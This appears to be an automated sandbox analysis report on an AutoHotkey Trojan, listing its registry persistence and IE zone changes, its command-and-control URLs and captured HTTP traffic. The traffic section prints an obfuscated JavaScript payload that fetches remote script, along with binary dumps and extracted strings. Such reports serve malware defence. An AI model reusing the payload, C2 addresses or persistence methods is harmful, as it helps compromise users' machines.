"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Google Chromium" = "%Documents and Settings%\%current user%\Application Data\Chromium.exe"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process wget.exe:612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA B5 C7 84 55 C6 65 18 D8 1A AD 49 8D A3 42 F9"

The process arsiv.exe:792 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 6A B0 D1 83 7C EC 7D F6 17 EB F1 25 F0 2C F7"

The process %original file name%.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC AC 18 DF C1 D5 6E 61 C5 72 C8 E0 7A 3B 0A 64"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\RarSFX0]
"Installer.exe" = "Adobe Installation Helper"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Dropped PE files

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 15741 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://joojlee.com/ahk/ok.txt	104.28.31.37
hxxp://joojlee.com/ahk/req.php?type=update_hash	104.28.31.37
hxxp://joojlee.com/ahk/req.php?type=js	104.28.31.37
hxxp://joojlee.com/ahk/req.php?type=key	104.28.31.37
hxxp://joojlee.com/ahk/req.php?type=arsiv_hash	104.28.31.37
hxxp://joojlee.com/ahk/req.php?type=arsiv_link	104.28.31.37
hxxp://a29.dscg10.akamai.net/app.exe
hxxp://joojlee.com:80/ahk/req.php?type=arsiv_link	104.28.31.37
hxxp://8cc292d68fdfebbf5705-0f9258f6b9e63c4675e7a36266ad1183.r27.cf1.rackcdn.com:80/app.exe	212.30.134.213
whos.amung.us	67.202.94.86
www.google.com	173.194.113.210

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Suspicious User-Agent (AutoHotkey)

Traffic

GET /ahk/ok.txt HTTP/1.1

User-Agent: AutoHotkey

Host: joojlee.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Fri, 13 Feb 2015 13:22:12 GMT

Content-Type: text/plain

Content-Length: 9

Connection: keep-alive

Set-Cookie: __cfduid=d6ca28a18e37a4fec02960fbaa7b2e5ca1423833732; expires=Sat, 13-Feb-16 13:22:12 GMT; path=/; domain=.joojlee.com; HttpOnly

Accept-Ranges: bytes

ETag: "9-54c9c529-a81721174ce72eb7"

Last-Modified: Thu, 29 Jan 2015 05:29:13 GMT

Server: cloudflare-nginx

CF-RAY: 1b81555b83cc0c6b-AMS
Server_ok....


GET /ahk/req.php?type=update_hash HTTP/1.1

User-Agent: AutoHotkey

Host: joojlee.com

Cache-Control: no-cache

Cookie: __cfduid=d6ca28a18e37a4fec02960fbaa7b2e5ca1423833732

HTTP/1.1 200 OK

Date: Fri, 13 Feb 2015 13:22:12 GMT

Content-Type: text/javascript; Charset=UTF8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Server: cloudflare-nginx

CF-RAY: 1b81555c73eb0c6b-AMS
0......


GET /ahk/req.php?type=js HTTP/1.1

User-Agent: AutoHotkey

Host: joojlee.com

Cache-Control: no-cache

Cookie: __cfduid=d6ca28a18e37a4fec02960fbaa7b2e5ca1423833732

HTTP/1.1 200 OK

Date: Fri, 13 Feb 2015 13:22:12 GMT

Content-Type: text/javascript; Charset=UTF8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Server: cloudflare-nginx

CF-RAY: 1b81555d34090c6b-AMS
cb8..var _0x7dc6=["\x63\x68\x72\x6F\x6D\x65\x3A\x2F\x2F\x65\x78\x74\x6
5\x6E\x73\x69\x6F\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x75\x72\x6C","
\x63\x68\x72\x6F\x6D\x65\x3A\x2F\x2F\x63\x68\x72\x6F\x6D\x65\x2F\x65\x
78\x74\x65\x6E\x73\x69\x6F\x6E","\x63\x68\x72\x6F\x6D\x65\x3A\x2F\x2F\
x73\x65\x74\x74\x69\x6E\x67\x73\x2F\x72\x65\x73\x65\x74\x50\x72\x6F\x6
6\x69\x6C\x65\x53\x65\x74\x74\x69\x6E\x67\x73","\x6F\x70\x65\x72\x61\x
3A\x2F\x2F\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E\x73\x2F","\x62\x72\x6F\
x77\x73\x65\x72\x3A\x2F\x2F\x74\x75\x6E\x65\x2F","\x63\x68\x72\x6F\x6D
\x65\x3A\x2F\x2F\x68\x65\x6C\x70\x2F","\x69\x64","\x72\x65\x6D\x6F\x76
\x65","\x74\x61\x62\x73","\x61\x64\x64\x4C\x69\x73\x74\x65\x6E\x65\x72
","\x6F\x6E\x55\x70\x64\x61\x74\x65\x64","\x6C\x65\x6E\x67\x74\x68","\
x3C\x61\x6C\x6C\x5F\x75\x72\x6C\x73\x3E","\x62\x6C\x6F\x63\x6B\x69\x6E
\x67","\x6F\x6E\x42\x65\x66\x6F\x72\x65\x52\x65\x71\x75\x65\x73\x74","
\x77\x65\x62\x52\x65\x71\x75\x65\x73\x74","\x63\x73\x70","\x6F\x6E\x72
\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x6
5\x61\x64\x79\x53\x74\x61\x74\x65","\x75\x72\x69","\x70\x75\x73\x68","
\x66\x6F\x72\x45\x61\x63\x68","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x6
5\x78\x74","\x70\x61\x72\x73\x65","\x47\x45\x54","\x68\x74\x74\x70\x3A
\x2F\x2F\x6A\x6F\x6F\x6A\x6C\x65\x65\x2E\x63\x6F\x6D\x2F\x61\x68\x6B\x
2F\x67\x65\x74\x2E\x6A\x73\x3F\x63\x61\x63\x68\x65\x3D","\x72\x61\x6E\
x64\x6F\x6D","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x64\x65\x76\x74\x
6F\x6F\x6C\x73\x3A\x2F\x2F","\x65\x78\x65\x63\x75\x74\x65\x53\x63\
<<< skipped >>>

GET /ahk/req.php?type=key HTTP/1.1

User-Agent: AutoHotkey

Host: joojlee.com

Cache-Control: no-cache

Cookie: __cfduid=d6ca28a18e37a4fec02960fbaa7b2e5ca1423833732

HTTP/1.1 200 OK

Date: Fri, 13 Feb 2015 13:22:12 GMT

Content-Type: text/javascript; Charset=UTF8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Server: cloudflare-nginx

CF-RAY: 1b81555e04370c6b-AMS
9c..jogoilaonpjembimhekgnboineibhdhf#MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBi
QKBgQDfjeS5fg1FCFXrERdwKEZfr5X45Y/RZMj /2z7yzUJ4lvtVvy73ryJ /KHvK2wKec
sapHK/HXDN9/EPRL4BF/..5d..zhJGDxhQ3KhrHW ouzXBqhrzHpZi 8xB8LOmJ1lTcCJk
2H5IvMId83r3ZF QiEnZio9UhsQaR4yQccdXX6CJp3QIDAQAB..0......


GET /ahk/req.php?type=arsiv_hash HTTP/1.1

User-Agent: AutoHotkey

Host: joojlee.com

Cache-Control: no-cache

Cookie: __cfduid=d6ca28a18e37a4fec02960fbaa7b2e5ca1423833732

HTTP/1.1 200 OK

Date: Fri, 13 Feb 2015 13:22:13 GMT

Content-Type: text/javascript; Charset=UTF8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Server: cloudflare-nginx

CF-RAY: 1b81555f145f0c6b-AMS
20..0c4950e06182df940d3e841551aa4378..0..HTTP/1.1 200 OK..Date: Fri, 1
3 Feb 2015 13:22:13 GMT..Content-Type: text/javascript; Charset=UTF8..
Transfer-Encoding: chunked..Connection: keep-alive..Vary: Accept-Encod
ing..Server: cloudflare-nginx..CF-RAY: 1b81555f145f0c6b-AMS..20..0c495
0e06182df940d3e841551aa4378..0..

GET /app.exe HTTP/1.0

User-Agent: Wget/1.5.3.1

Host: 8cc292d68fdfebbf5705-0f9258f6b9e63c4675e7a36266ad1183.r27.cf1.rackcdn.com:80

Accept: */*

HTTP/1.0 200 OK

Last-Modified: Fri, 23 Jan 2015 17:14:24 GMT

ETag: 0c4950e06182df940d3e841551aa4378

Origin: hXXps://mycloud.rackspace.com

Content-Length: 31990778

Accept-Ranges: bytes

X-Timestamp: 1422033263.32882

Content-Type: application/x-msdownload

X-Trans-Id: tx696ae59a7f254d19ab13a-0054c281b8dfw1

Cache-Control: public, max-age=101699

Expires: Sat, 14 Feb 2015 17:37:12 GMT

Date: Fri, 13 Feb 2015 13:22:13 GMT

Connection: close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$..........f..{5..{5
..{5...5..{5..z5(.{5...5..{5...5..{5...5..{5...5..{5...5..{5...5..{5Ri
ch..{5........PE..L...Yj>O.....................d...............0...
.@..................................................................K.
.3...L<[email protected]....................
...........................0...............................text...2...
........................ ..`.rdata..5....0......."..............@[email protected]
ata....V...P.......@[email protected]..........
....@[email protected][email protected]..............@..@......................
......................................................................
......................................................................
......................................................................
......................................................................
....................................................@s... s...........
.............................D$..L$....L$.u..D$......S.....D$..d$....D
$.....[...............WVS3..D$...}.G.T$.........D$..T$..D$...}.G.T$...
......D$..T$...u..L$..D$.3......D$......A...L$..T$..D$...........u....
..d$....D$.....r.;T$.w.r.;D$.v.N3...Ou........[^_.........WVU3.3..D$..
.}.GE.T$.........D$..T$..D$...}.G.T$.........D$..T$...u(.L$..D$.3.....
.D$........d$......d$....G...L$..T$..D$...........u......d$....D$.....
r.;T$.w.r.;D$.v.N D$..T$.3. D$..T$.My..................Ou........]
<<< skipped >>>

GET /ahk/req.php?type=arsiv_link HTTP/1.0

User-Agent: Wget/1.5.3.1

Host: joojlee.com:80

Accept: */*

HTTP/1.1 302 Found

Date: Fri, 13 Feb 2015 13:22:13 GMT

Content-Type: text/javascript; Charset=UTF8

Connection: close

Set-Cookie: __cfduid=d83c62d96bebba502ef4c4978ed3a11481423833733; expires=Sat, 13-Feb-16 13:22:13 GMT; path=/; domain=.joojlee.com; HttpOnly

Vary: Accept-Encoding

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Location: hXXp://8cc292d68fdfebbf5705-0f9258f6b9e63c4675e7a36266ad1183.r27.cf1.rackcdn.com/app.exe

Server: cloudflare-nginx

CF-RAY: 1b81556307370c89-AMS

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.rsrc

YYu.Pj

!"#$%%&'())* ,-./0123456789:;<""=>

VSSSh

E`SSh

SSSSSSSh

urSSSh

WSSSh

zSSShX

t*SSh

t3SSSh

VWumh0%F

u.hL%F

It.It

SSSSh

tASSSh

udPS

uÊ;MP|

!!!!!!""#$%&'(((((())* ,-.CCCCCCCC//C01234445656789:;9:;CCC<=>?@AB

AutoHotkey

AppsKey

ListHotkeys

KeyHistory

DetectHiddenWindows

SetKeyDelay

Hotkey

KeyWait

GetKeyState

URLDownloadToFile

MsgBox

IfMsgBox

AHK Keybd

X X

NOTE: To disable the key history shown below, add the line "#KeyHistory 0" anywhere in the script. The same method can be used to change the size of the history buffer. For example: #KeyHistory 100 (Default is 40, Max is 500)

The oldest are listed first. VK=Virtual Key, SC=Scan Code, Elapsed=Seconds since the previous event. Types: h=Hook Hotkey, s=Suppressed (blocked), i=Ignored because it was generated by an AHK script, a=Artificial, #=Disabled via #IfWinActive/Exist.

NOTE: Only the script's own keyboard events are shown

(not the user's), because the keyboard hook isn't installed.

Modifiers (Hook's Logical) = %s

Modifiers (Hook's Physical) = %s

Prefix key is down: %s

OWarning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.

"%s" is not a valid key name. The current thread will exit.

"%s" is not allowed as a prefix key.

%u hotkeys have been received in the last %ums.

(see #MaxHotkeysPerInterval in the help file)

Max hotkeys.

The AltTab hotkey "%s" must have exactly one modifier/prefix.

The AltTab hotkey "%s" must specify which key (L or R).

Nonexistent hotkey variant (IfWin). The current thread will exit.

Nonexistent hotkey. The current thread will exit.

SCx

A%s[%u of %u]: %-1.60s%s

: -*.|&^/

HKEY_USERS

HKEY_CURRENT_USER

HKEY_CURRENT_CONFIG

HKEY_CLASSES_ROOT

HKEY_LOCAL_MACHINE

%s\%s

<>=/|^,:*&~!() -"'\;`{}

timesincepriorhotkey

timesincethishotkey

priorhotkey

thishotkey

subkey

keydelay

detecthiddenwindows

%s%s%s

if %s %s %s and %s

%s%s %s %s

MbP?u:

%sGlobal Variables (alphabetical)%s

Local Variables for %s()%s

Key History has been disabled via #KeyHistory 0.

Window: %s

Keybd hook: %s

Mouse hook: %s

Enabled Timers: %u of %u (%s)

Interrupted threads: %d%s

Paused threads: %d of %d (%d layers)

Modifiers (GetKeyState() now) = %s

AutoHotkey2

%%%s%s%s

Script lines most recently executed (oldest first). Press [F5] to refresh. The seconds elapsed between a line and the one after it is in parentheses to the right (if not 0). The bottommost line's elapsed time is the number of seconds since it executed.

Critical Error: %s

Specifically: %-1.100s%s

%s%s: %-1.500s

in #include file "%s"

Specifically: %s

%s (%d) : ==> %s

Line Text: %-1.100s%s

Error at line %u

Action: <%-0.400s%s>%s

Params: <%-0.400s%s>

Verb: <%s>

.hta"

.cmd"

.com"

.bat"

.exe"

%s %s

System verbs unsupported with RunAs. The current thread will exit.

#KeyHistory

#MaxThreadsPerHotkey

#MaxHotkeysPerInterval

#HotkeyInterval

#HotkeyModifierTimeout

#InstallKeybdHook

<>=/|^,:*&~!() -

Too many parameters passed to function.

Too few parameters passed to function.

Caller must pass a variable to this ByRef parameter.

<>/|^,*&~!. -"

Unsupported parameter default.

<>=/|^,:*&~!()"

"%s" requires that parameter #%u be non-blank.

"%s" requires at least %d parameter%s.

Invalid hotkey.

<>=/|^,:*&~!() -".

Unsupported static initializer.

Could not extract script from EXE.

Duplicate hotkey.

Hotkeys/hotstrings are not allowed inside functions.

{Blind}{%s Up}

*%s::

*%s up::

{Blind}%s%s{%s DownTemp}

if not GetKeyState("%s")

Note: The hotkey %s will not be active because it does not exist in the current keyboard layout.

<>=/|^,:

<>=/|^,:. -*&!?~

Join

>AUTOHOTKEY SCRIPT<

EndKey:

SOFTWARE\AutoHotkey

\\.\%c:

\\.\vwin32

open "%s" alias AHK_PlayMe

All Files (*.*)

Text Documents (*.txt)

*.txt

%s%c%sÊll Files (*.*)%c*.*%c

Select File - %s

1.0.48.05

\AutoHotkey.exe

WIN32_WINDOWS

.DEFAULT\Control Panel\Desktop\ResourceLocale

SOFTWARE\Microsoft\Windows\CurrentVersion

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

Compile error %d at offset %d: %s

%sBottom

%sRight

%sTop

%sLeft

0xX

Could not open URL hXXp://VVV.autohotkey.com in default browser.

hXXp://VVV.autohotkey.com

hh.exe

%sAutoHotkey.chm"

\AutoHotkey.chm"

%sAU3_Spy.exe"

\AU3_Spy.exe"

set cd door %s wait

open %s type cdaudio alias cd wait shareable

set cdaudio door %s wait

Component Doesn't Support This Control Type

Mixer Doesn't Support This Component Type

0xX

Mb@AAutoHotkey v1.0.48.05

Len%d

Pos%d

Len%s

Pos%s

0.0.0.0

InternetOpenUrlA

Select Folder - %s

%u.%u.%u.%u

RunAs: Missing advapi32.dll. The current thread will exit.

%dGui

vkX

AutoHotkeyGUI

Password

Report

msctls_hotkey32

Button%s

&Suspend Hotkeys

Supported only for the tray menu The current thread will exit.

dddddd

dA\\?\

GdiplusShutdown

dd

The following %s name contains an illegal character:

"%-1.300s"%s

The maximum number of MsgBoxes has been reached.

operand of unlimited repeat could match the empty string

POSIX named classes are supported only within a class

erroffset passed as NULL

POSIX collating elements are not supported

this version of PCRE is not compiled with PCRE_UTF8 support

PCRE does not support \L, \l, \N, \U, or \u

support for \P, \p, and \X has not been compiled

(*VERB) with an argument is not supported

mscoree.dll

- This application cannot run using the active version of the Microsoft .NET Runtime

Please contact the application's support team for more information.

GetProcessWindowStation

user32.dll

internal state. The program cannot safely continue execution and must

continue execution and must now be terminated.

WSOCK32.dll

WINMM.dll

VERSION.dll

COMCTL32.dll

GetWindowsDirectoryA

KERNEL32.dll

GetKeyboardLayout

UnhookWindowsHookEx

SetWindowsHookExA

RegisterHotKey

UnregisterHotKey

SetKeyboardState

GetKeyboardState

VkKeyScanExA

MapVirtualKeyA

GetAsyncKeyState

GetKeyNameTextA

keybd_event

EnumChildWindows

EnumWindows

ExitWindowsEx

USER32.dll

GDI32.dll

comdlg32.dll

RegCloseKey

RegEnumKeyExA

RegQueryInfoKeyA

RegOpenKeyExA

RegCreateKeyExA

RegDeleteKeyA

ADVAPI32.dll

ShellExecuteExA

SHFileOperationA

SHELL32.dll

ole32.dll

OLEAUT32.dll

GetCPInfo

-()[]{}:;'"/\,.?!

zcÁ

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Application Data\Chromium.exe

@.reloc

\$@9_0~{

V SSh

N SSh

Codejock.SkinFrameworkGlobalSettings.12.0.2

Codejock.SkinFramework.12.0.2

1.2.10

deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly

1.2.3

inflate 1.2.3 Copyright 1995-2005 Mark Adler

MFC42.DLL

MSVCRT.dll

OLEPRO32.DLL

IMAGEHLP.dll

SKINFRAMEWORK.OCX

Xtreme %s ActiveX %s

v12.0.2

Xtreme SuitePro ActiveX %s

.PAVCException@@

%d.%d.%d

%s [%s]

.PAVCOleException@@

Codejock.%s.v%i.%i.%i.lic

PRODUCT-ID: Codejock.SkinFramework.ActiveX.v12.0

RemoveAllWindows

AutoApplyNewWindows

.cjstyles

.msstyles

Themes.ini

PortName

msimg32.dll

GDI32.DLL

IsAlphaIconsSupported

.PAVCMemoryException@@

.PAVCArchiveException@@

XTPNotificationSinkMT_MsgWnd

%Y-%d-%mT%H:%M:%S

%Y-%d-%m

%H:%M:%S

%s[%i]

windows-1254

windows-874

SUBLANG_PORTUGUESE_BRAZILIAN

Portuguese (Brazil)

SUBLANG_PORTUGUESE

LANG_PORTUGUESE

Portuguese (Portugal)

windows-1255

windows-1257

windows-1253

windows-1252

windows-1250

windows-1256

windows-1251

COMCTL32.DLL

User32.dll

UXTHEME.DLL

MSCTF.DLL

WININET.DLL

USER32.DLL

KERNEL32.DLL

SHLWAPI.DLL

NTDLL.DLL

UxTheme.dll

PSAPI.DLL

%[^,], %ld, %s

LEFTPRESSED

ALWAYSSHOWSIZINGBAR

MSGBOXFONT

WindowsForms

libpng error: %s

libpng error: %s, offset=%d

libpng error no. %s: %s

libpng warning: %s

libpng warning no. %s: %s

NULL row buffer for row %ld, pass %d

Unknown zTXt compression type %d

Incomplete compressed datastream in %s chunk

Data error in compressed datastream in %s chunk

Buffer error in compressed datastream in %s chunk

gamma = (%d/100000)

gx=%f, gy=%f, bx=%f, by=%f

wx=%f, wy=%f, rx=%f, ry=%f

incorrect gamma=(%d/100000)

iTXt chunk not supported.

.PAVCFileException@@

&%%'%'%'%'%'%'%'%%%

311111111111111111

337173737371733377

77777777777

7777777777777777

9999999999

9;9;9;9;9

22222222222222222322

2222222222222222

.((2((2((2(.

}'$%2$%%%2$%%$2

0/,/,***/,/,{

,,,,333/,,,

999999999

99999999

`/,,,/,3,/,////1

stdole2.tlbWWW

AutoApplyNewWindowsW

RemoveAllWindows

.\..\Help\SymbolReference.chmW 

Xtreme SkinFramework ActiveX Control 12.0.2WWW

1%2s2

0 0$0(0,0004080<0

4O4g4

: :$:(:,:'<.<

4$4(4,40444

0 0004080<0@0

.Class 3 Public Primary Certification Authority0

hXXp://ocsp.verisign.com0

"hXXp://crl.verisign.com/tss-ca.crl0

Thawte Certification1

0hXXp://crl.verisign.com/ThawteTimestampingCA.crl0

2Terms of use at hXXps://VVV.verisign.com/rpa (c)041.0,

hXXps://VVV.verisign.com/rpa01

hXXp://crl.verisign.com/pca3.crl0

.Class 3 Public Primary Certification Authority

/hXXp://CSC3-2004-crl.verisign.com/CSC3-2004.crl0D

hXXps://VVV.verisign.com/rpa0

hXXp://ocsp.verisign.com0?

3hXXp://CSC3-2004-aia.verisign.com/CSC3-2004-aia.cer0

hXXp://VVV.codejock.com 0

`.data

.reloc

CmDialogWndClass

cmdlg98.chm

Windows

%s,%s,%s

%s.drv

WINSPOOL.DRV

Ports

MbP?hhctrl.ocx

CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32

COMDLG32.OCX

z!{lX-X-X-XX-XXXXXX}

SSShD:{!

GetProcessHeap

CreateDialogIndirectParamA

RegOpenKeyA

GetViewportExtEx

SetViewportExtEx

SetViewportOrgEx

%s%s.DLL

%u\%s.dll

{lX-X-X-XX-XXXXXX}

CLSID\%s

%s Object

%s.%s.%ld

%s.%s

%s.%s\CurVer

%s\InprocServer

VERSION.DLL

%ld - %s

cdlGetNotSupportedWW

0{ cdlSetNotSupportedWW

0B.cdlMemAllocFailureWW

.cdlNoFontsWW

cdlHelpKeyWW

cdlHelpPartialKeyWWWX

cdlPortraitWX

HelpKeyW

pbstrHelpKey

ComDlg32.OcxWW

cmdlg98.chmWWW

Sets or returns state of Collate check box.WWW%

Prevents a warning message when there is no default printer.WW5

Sets or returns the state of the Pages option button.WE

Returns a device context for the printer selection.WWW

Dialog box displays the Help button.WW!

Sets support for multiple copies.W,

Sets initial color value for the dialog box.WWK

Entire dialog box is displayed, including the Define Custom Colors section.WWW<

Disables the Define Custom Colors section of the dialog box.WW"

Generates a message box if the selected file already exists.WW

Allows invalid characters in the returned file name.WW:

Extension of returned file name is different from the one set by DefaultExt.WW%

User can enter only names of existing files.WWF

The returned file will not have the Read Only attribute set.WW

Windows 95 Open A File dialog box template.WWW

Long filenames.WWW;

Dialog box lists only screen fonts supported by the system.WWW5

Dialog box lists only fonts supported by the printer.W4

Dialog box lists available screen and printer fonts.WW7

Dialog enables strikeout, underline, and color effects.WWW$

Dialog box enables the Apply button.WW@

Dialog box allows only fonts that use the Windows character set.WW3

Dialog box should not allow vector-font selections.WWWL

Dialog box should not allow graphic device interface (GDI) font simulations.WWH

Selects font sizes within the range specified by Min and Max properties.WW0

Dialog box should select only fixed-pitch fonts.WWL

Allows only the selection of fonts available to both the screen and printer.WWG

Displays an error if a user selects a font or style that doesn't exist.WWW>

No font style selected.WWW

Couldn't allocate memory for FileName or Filter.WW

Cancel was selected.WW!

Call to Windows Help failed.WW*

The function failed to load a specified string.WWW1

The function failed to lock a specified resource.WH

The function was unable to allocate memory for internal data structures.WWD

The function was unable to lock the memory associated with a handle.WW

No fonts exist.WWW=

File name is invalid.WC

An attempt to subclass a listbox failed due to insufficient memory.WWWB

DevMode and DevNames data structures describe two different printers.WH

The printer-device driver failed to initialize a DEVMODE data structure.WW3

The PrintDlg function failed during initialization.WWWK

The PrintDlg function failed to load the specified printer's device driver.WWW!

No printer device-drivers were found.WB

The Common Dialog function failed to parse the strings in WIN.INI.H

The printer device driver failed to initialize a DevMode data structure.WWK

The [devices] section of WIN.INI does not contain an entry for the printer.WWW:

No template provided by the application.WW/

Application did not provide an instance handle.WWW#

Displays Help for a particular topic.WO

Notifies the Help application that the specified Help file is no longer in use.WWW.

Display Help for using the Help application itself.WWW 

Set the current Index for multi-index Help.WWW2

Displays a topic identified by a context number.WW8

Creates a Help file that displays text in only one font.WW'

Displays Help for a particular keyword.WWW'

Displays Help for a particular command.WWW'

Call the search engine in Windows Help.WWW"

Portrait printer paper orientation#

Sets the string displayed in the title bar of the dialog box.WQ

Returns/sets the default filename extension for the dialog box.WWW(

Returns/sets the initial file directory.WW

Returns/sets the selected color.WW"

Specifies the name of the font that appears in each row for the given level.WW

Returns/sets italic font styles.WW'

Returns/sets strikethrough font styles.WWW#

Returns/sets underline font styles.WWW8

Returns/sets the value for the first page to be printed.WWR

Returns/sets the maximum font size (Font dialog) or print range (Print dialog).WWWH

Returns/sets a value that determines the number of copies to be printed.WWP

Indicates whether an error is generated when the user chooses the Cancel button.WWC

Returns/sets the name of the Help file associated with the project.WWW/

Returns/sets the type of online Help requested.WWWB

Returns/sets the keyword that identifies the requested Help topic.f

Returns/sets a default filter for an Open or Save As dialog box.WW8

Returns/sets the context ID of the requested Help topic.WWX

Specifies the size (in points) of the font that appears in each row for the given level.WW4

Returns/sets the type of dialog box to be displayed.WWT

Returns/sets the maximum size of the filename opened using the CommonDialog control.WWI

Returns a handle (from Microsoft Windows) to the object's device context.WQ

Displays the CommonDialog control's Open dialog box.WW7

Displays the CommonDialog control's Save As dialog box.WWW5

Displays the CommonDialog control's Printer dialog box.WWW8

Runs Winhelp.EXE and displays the Help file you specify.WW&

<!<*<3<><

ComDlg32.dbg

=VVV.verisign.com/repository/CPS Incorp. by Ref.,LIAB.LTD(c)961>0<

'hXXps://VVV.verisign.com/repository/CPS

This certificate incorporates by reference, and its use is strictly

subject to, the VeriSign Certification Practice Statement (CPS)

hXXps://VVV.verisign.com; by E-mail at [email protected]; or

USA Copyright (c)1996 VeriSign, Inc. All Rights Reserved. CERTAIN

WARNING: THE USE OF THIS CERTIFICATE IS STRICTLY SUBJECT TO THE

VERISIGN CERTIFICATION PRACTICE STATEMENT. THE ISSUING AUTHORITY

DISCLAIMS CERTAIN IMPLIED AND EXPRESS WARRANTIES, INCLUDING WARRANTIES

BE LIABLE FOR CONSEQUENTIAL, PUNITIVE, AND CERTAIN OTHER DAMAGES. SEE

4hXXps://VVV.verisign.com/repository/verisignlogo.gif0

hXXps://VVV.verisign.com/CPS0b

hXXp://VVV.microsoft.com/vbasic 0

Catalyst.SocketCtrl.1

Catalyst.SocketPropPage.1

NETAPI32.dll

CSWSK32.ocx

LocalPort

RemotePort

PortString

PeerPort

ReservedPort

%d.%d

Unknown control error %d

X:X:X:X:X:X

,%d,%d

WSOCK32.DLL

getservbyport

WSAAsyncGetServByPort

WSATRC32.DLL

TX_getservbyport

TX_WSAAsyncGetServByPort

%d.%d.%d.%d

7LocalPortWWWd

}|RemotePortWWd

/JPortStringWWd

N\PeerPortd

EReservedPortd

CSW25CTL.HLPWW

2-2H2c2}2

=VVV.verisign.com/repository/RPA Incorp. by Ref.,LIAB.LTD(c)981.0,

'hXXps://VVV.verisign.com/repository/RPA0

=VVV.verisign.com/repository/RPA Incorp. by Ref.,LIAB.LTD(c)981>0<

